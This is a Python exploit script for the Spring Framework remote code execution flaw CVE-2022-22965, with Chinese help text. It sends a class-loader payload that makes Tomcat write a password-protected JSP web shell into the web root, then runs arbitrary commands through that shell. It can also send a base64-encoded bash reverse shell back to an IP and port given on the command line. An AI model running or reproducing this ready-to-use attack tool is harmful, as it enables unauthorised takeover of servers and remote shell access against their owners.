# CVE-2022-22965:Spring远程代码执行
import requests
import argparse
import time
import re
import base64
import urllib.parse
header = {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Accept-Language": "en",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
"Connection": "close",
"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1"
}
header1 = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
}
def poc(ip, cmd):
payload = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
cmd1 = cmd.encode('utf-8')
cmd2 = urllib.parse.quote(cmd1)
payload1 = "/tomcatwar.jsp?pwd=j&cmd=" + cmd2
payload2 = "/tomcatwar.jsp"
ceshi = requests.get(url=ip + payload2)
if ceshi.status_code != 200:
rizhi = requests.get(url=ip + payload, headers=header)
if rizhi.status_code ==200:
time.sleep(10)
ruslut = requests.get(url=ip + payload1,headers=header1,verify=False)
c = ruslut.text
a = c.split('//')
print(a[0])
print('无CVE-2022-22965漏洞')
else:
ruslut = requests.get(url=ip + payload1,headers=header1,verify=False)
c = ruslut.text
a=c.split('//')
print(a[0])
def shell(url,ip,prot):
ul="/tomcatwar.jsp?pwd=j&cmd="
sh=f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
data1 = sh.encode('utf-8')
encoded_data = base64.b64encode(data1)
encoded_sh = encoded_data.decode('utf-8')
shel='bash -c {echo,123}|{base64,-d}|{bash,-i}'
new_text = shel.replace("123", encoded_sh)
data = new_text.encode('utf-8')
encoded_shell = urllib.parse.quote(data)
payload = url+ul+encoded_shell
print(payload)
c=requests.get(url=payload,headers=header1,verify=False)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', dest='url', help="输入url")
parser.add_argument('-c', '--cmd', dest='cmd', default='pwd', help='输入命令(执行带参数的命令将参数双引起来)')
parser.add_argument('-i', '--ip', dest='ip', help='输入反弹ip')
parser.add_argument('-p', '--prot', dest='prot', help='输入反弹端口')
parser.add_argument('-V', '--version', action='version', version='%(prog)s 1.0')
args = parser.parse_args()
if args.url and args.ip and args.prot:
shell(args.url,args.ip,args.prot)
elif args.url:
poc(args.url, args.cmd)
else:
print("-h 帮助信息 ")
if __name__ == '__main__':
main()
